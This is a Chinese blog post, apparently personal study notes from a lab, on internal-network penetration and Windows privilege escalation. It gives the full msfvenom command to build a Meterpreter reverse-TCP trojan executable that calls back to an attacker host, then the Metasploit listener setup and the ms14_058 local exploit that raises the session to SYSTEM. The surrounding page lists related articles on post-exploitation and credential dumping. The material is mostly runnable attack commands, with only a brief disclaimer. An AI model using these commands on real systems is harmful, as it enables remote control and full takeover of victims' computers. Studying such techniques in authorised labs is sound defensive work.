内网渗透 -- 提升权限(利用提权漏洞)

最新推荐文章于 2023-06-26 11:10:35 发布
最新推荐文章于 2023-06-26 11:10:35 发布
阅读量338 收藏
点赞数
分类专栏: 某教程学习笔记 文章标签: web安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/107072404
版权

沉默不是没有情绪,是感觉没有再说的意义。。。。

----  网易云热评

环境:小攻:Kali 2020,ip:192.168.1.133

          小受:win7 x86,ip:192.168.1.137

 

一、生成木马

1、查看Windows下可利用的payloads

msfvenom -l payloads | grep windows | grep tcp

2、选择windows/meterpreter/reverse_tcp并生成木马

-p 选择一个payload

-l 载荷列表

-f 生成的文件格式

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.133 LPORT=4444 -b"\x00" -f exe > aiyou.exe

3、/root目录下会生成一个aiyou.exe文件

二、通过Metasploit监听小受

1、启动Metasploit,use exploit/multi/handler

2、设置payload,set payload windows/meterpreter/reverse_tcp

3、设置监听,set lhost 192.168.1.133

4、设置监听端口,set lport 4444

5、run

6、将生成的aiyou.exe拷贝到小受中并运行,getuid查看权限,普通用户

 

三、提权漏洞(ms14_058)

1、选择提权漏洞:use exploit/windows/local/ms14_058_track_popup_menu

2、查看需要设置的参数:show options

3、设置session值:set session 1,执行run

4、重新生成一个session,查看权限

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

 

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

web安全工具库
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
浅谈MS17-010永恒之蓝漏洞利用(渗透,后渗透)2
m0_70383208的博客
05-28 472
接着上面的成功渗透的结果,我们可以看到一个meterpreter,我们可以输入命令查看当前用户信息 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 接着我们需要使用一个后渗透模块kiwi-后渗透阶段的一款利器. 输入load kiwi //加载kiwi,如下图 接下来我们需要进行进程迁移,先使用ps 查看当前进程 将 SYSTEM 权限 迁移为 Administrator meterpreter > ps
渗透工具之msf
热门推荐
zhalang8324的博客
08-17 3万+
转载自 csdn:忆蓉之心 简介 它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 环境 工具:msf4 伪装木马 原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
Nmap 渗透实列
煮酒闲谈
08-25 3694
0x00 前言渗透是个持续的过程,不断地搜集信息,整理信息,以及利用信息,最终的目标就是拿到系统乃至整个网络的最高权限。在笔者看来,渗透测试与安全研究的最大不同就是前者擅长利用后者的研究成果并运用到实战之中。今天笔者将继续来分析渗透测试学习笔记系列的第二个案例。 0x01 案例分析实验环境: 目标靶机:10.11.1.0/24 攻击机:Kali Linux (10.11.0.38) 渗透过程:首先,
Web的基本漏洞--提权
尽欢的博客
06-05 386
提权的介绍
内网渗透讲义(1).pdf
06-30
渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大...
如何渗入企业内网-Bypass.pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
网络安全-渗透完整笔记
03-27
换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。渗透测试的目的是...
内网渗透思路.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
渗透完全技巧.pdf
10-03
提权 拥有本地管理员权限 获取密码 绕过LSA防护策略读取密码 token窃取 查看本地存储的所有密码 卷影拷贝(获取域控所有hash) dpapi解密 2.内网信息收集 本机信息收集 8.获取当前用户密码 Windows Linux 浏览器 ...
Web安全测试中常见逻辑漏洞解析(实战篇)
04-05
通过实战解释在web安全测试中经常会遇到的一些逻辑漏洞
内网渗透常用提权方式总结
j1044957016的博客
06-01 6981
内网菜鸡艰难学习,希望一样的菜鸡能省去打开一堆链接的时间吧
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1003
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞系统漏洞,服务器漏洞,第三方软件漏洞漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
【kali】29 提权—— 利用漏洞提权
(∪.∪ )...zzz的博客
11-27 7893
这里写自定义目录标题一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限1. Ms011-080 对应补丁 Kb25927992. kali集成了exploit3. 查看.py4. 生成.exe5. 运行exe提权成功二、Win7 使用 Ms14-068 获取 域控制器的权限1.win2003搭建域控制器2. 修改win2003域控制器的用户权限三、利用 CVE-2012-0056 提升 linux 权限 一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限 1. Ms0
内网渗透总结一:第一步提权
yggcwhat
05-06 2249
内网渗透总结一:第一步提权!!!
【网络安全必备知识】本地提权漏洞分析
kali_Ma的博客
03-13 659
CVE-2023-21752 是 2023 年开年微软第一个有 exploit 的漏洞,原本以为有利用代码会很好分析,但是结果花费了很长时间,难点主要了两个:漏洞点定位和漏洞利用代码分析,欢迎指正。根据官方信息,该漏洞是 Windows Backup Service 中的权限提升漏洞,经过身份认证的攻击者可利用漏洞提升至 SYSTEM 权限。成功利用漏洞需要攻击者赢得竞争条件。EXP 代码位于 Github,提供了两个版本,版本 1 可以实现任意文件删除,可稳定复现;
渗透测试——提权方式总结
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
网络安全——漏洞扫描工具(AWVS的使用)
weixin_54055099的博客
08-20 6262
安全漏洞的概述和AWVS的使用
SQL Server代理启动失败,提示:用户 'NT AUTHORITY\SYSTEM' 登录失败
weixin_34112900的博客
01-13 926
现在想测试一下数据库的复制发布,提示代理没有启动,所以点右键启动代理,可是连继启动多次,都提示错误:SQLServer 错误: 18456,用户 'NT AUTHORITY\SYSTEM' 登录失败。 可以肯定是用户登录的问题,前段时间看见用户“builtin\administrators”不知道哪来的,也感觉没什么用,就给删除了,莫非是这个原因。于是在查询分析器里面...
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
5. 利用漏洞:根据收集到的信息,选择合适的漏洞利用方式,从而取得系统权限。 在实际攻击中,攻击者还可能会采用其他方式来利用 SSRF 漏洞,如访问内部 Web 应用、获取敏感文件等。因此,网站开发人员需要注意防范...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值